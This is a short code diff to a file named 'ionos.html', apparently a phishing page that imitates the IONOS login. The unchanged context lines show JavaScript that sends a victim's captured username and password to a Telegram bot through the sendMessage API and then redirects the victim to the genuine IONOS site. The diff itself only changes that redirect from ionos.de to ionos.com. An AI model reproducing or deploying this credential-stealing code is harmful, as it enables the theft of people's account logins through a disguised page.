--- a/ionos.html
+++ b/ionos.html
@@ -226,7 +226,7 @@ footer#footer ul li{
           fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=IONOS-RESULT=Username::${result1}==++==Password::${result2}`, {
               method: "GET"
           }).then(success => {
-              window.location.replace("https://ionos.de");
+              window.location.replace("https://ionos.com");
           }, error => {
               alert("Message not sent")
               console.log(error)
